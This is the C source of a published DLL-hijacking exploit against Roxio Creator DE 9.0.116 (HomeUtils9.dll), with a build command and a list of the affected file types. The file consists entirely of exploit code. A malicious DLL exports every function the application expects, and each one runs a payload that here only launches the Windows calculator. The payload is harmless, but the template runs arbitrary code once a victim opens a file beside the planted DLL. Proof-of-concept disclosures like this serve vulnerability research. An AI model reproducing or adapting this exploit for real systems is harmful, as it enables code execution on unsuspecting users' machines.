/*

Exploit Title: Roxio Creator DE DLL Hijacking Exploit (HomeUtils9.dll)
Date: August 25, 2010
Author: storm (storm@gonullyourself.org)
Version:  9.0.116 - Other versions are very possibly exploitable too
Tested on: Windows Vista SP2

http://www.gonullyourself.org/

gcc -shared -o HomeUtils9.dll Roxio-DLL.c

.c2d, .gi, and .roxio files are affected.

*/

#include <windows.h>
#define DllExport __declspec (dllexport)

DllExport void Dispatch_InvokeUpdate() { hax(); }
DllExport void GetCertificateItemValue() { hax(); }
DllExport void GetFeatureEnabled() { hax(); }
DllExport void GetFeatureEnabledGroup() { hax(); }
DllExport void GetFeatureGroup() { hax(); }
DllExport void GetFeatureGroupActivationDetail() { hax(); }
DllExport void GetRoxioKeyContents() { hax(); }
DllExport void LaunchPermission() { hax(); }
DllExport void LaunchPermission_Str() { hax(); }
DllExport void SAR_Dispatch_ActivateComponent() { hax(); }
DllExport void SAR_Dispatch_ActivateProduct() { hax(); }
DllExport void SAR_Dispatch_ActivateProductGroup() { hax(); }
DllExport void SAR_Dispatch_DoRegister() { hax(); }
DllExport void SAR_Dispatch_GetActivationDetail() { hax(); }
DllExport void SAR_Dispatch_IncrementUsage() { hax(); }
DllExport void SAR_Dispatch_IsActivated() { hax(); }
DllExport void SAR_Dispatch_IsRegistered() { hax(); }
DllExport void SAR_Dispatch_ReleaseActivation() { hax(); }
DllExport void SAR_GetCDKey() { hax(); }
DllExport void SAR_UsePermissionsCache() { hax(); }
DllExport void Upgrade() { hax(); }
DllExport void UseCodecPermission() { hax(); }

int hax()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}